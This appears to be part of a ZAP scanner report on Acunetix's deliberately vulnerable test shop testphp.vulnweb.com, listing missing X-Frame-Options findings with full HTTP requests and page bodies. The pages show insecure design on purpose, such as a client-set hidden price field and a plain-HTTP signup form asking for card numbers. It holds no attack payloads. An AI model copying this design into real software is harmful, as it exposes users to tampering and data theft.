"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Thing</h2><div class='story'><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 99 cm x 200 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $10000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='10000'><input type='hidden' name='addcart' value='6'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=7 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=7 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5734 |
Response Body - size: 5,734 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Trees</h2><div class='story'><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>bla bla bla</p><h3>Long description</h3><p>bla bla bla long</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p>the price of this item is: $15000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='15000'><input type='hidden' name='addcart' value='7'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/signup.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 271 bytes. |
GET http://testphp.vulnweb.com/signup.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6033 |
Response Body - size: 6,033 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>signup</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h2 id="pageName">Signup new user</h2> <h4>Please do not enter real information here.</h4> <h4>If you press the submit button you will be transferred to asecured connection.</h4> <form name="form1" method="post" action="/secured/newuser.php"> <table border="0" cellspacing="1" cellpadding="4"> <tr><td valign="top">Username:</td><td><input type="text" name="uuname" style="width:200px"></td></tr> <tr><td valign="top">Password:</td><td><input type="password" name="upass" style="width:200px"></td></tr> <tr><td valign="top">Retype password:</td><td><input type="password" name="upass2" style="width:200px"></td></tr> <tr><td valign="top">Name:</td><td><input type="text" name="urname" style="width:200px"></td></tr> <tr><td valign="top">Credit card number:</td><td><input type="text" name="ucc" style="width:200px"></td></tr> <tr><td valign="top">E-Mail:</td><td><input type="text" name="uemail" style="width:200px"></td></tr> <tr><td valign="top">Phone number:</td><td><input type="text" name="uphone" style="width:200px"></td></tr> <tr><td valign="top">Address:</td><td><textarea wrap="soft" name="uaddress" rows="5" style="width:200px"></textarea></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="signup" name="signup"></td></tr> </table> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 347 bytes. |
POST http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/product.php?pic=1 Content-Length: 19 |
Request Body - size: 19 bytes. |
price=500&addcart=1
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 348 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/guestbook.php Content-Length: 33 |
Request Body - size: 33 bytes. |
name=ZAP&text=&submit=add+message
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5393 |
Response Body - size: 5,393 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong>ZAP</strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/search.php?test=query |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 342 bytes. |
POST http://testphp.vulnweb.com/search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Content-Length: 25 |
Request Body - size: 25 bytes. |
searchFor=ZAP&goButton=go
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:51 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4772 |
Response Body - size: 4,772 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>search</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- 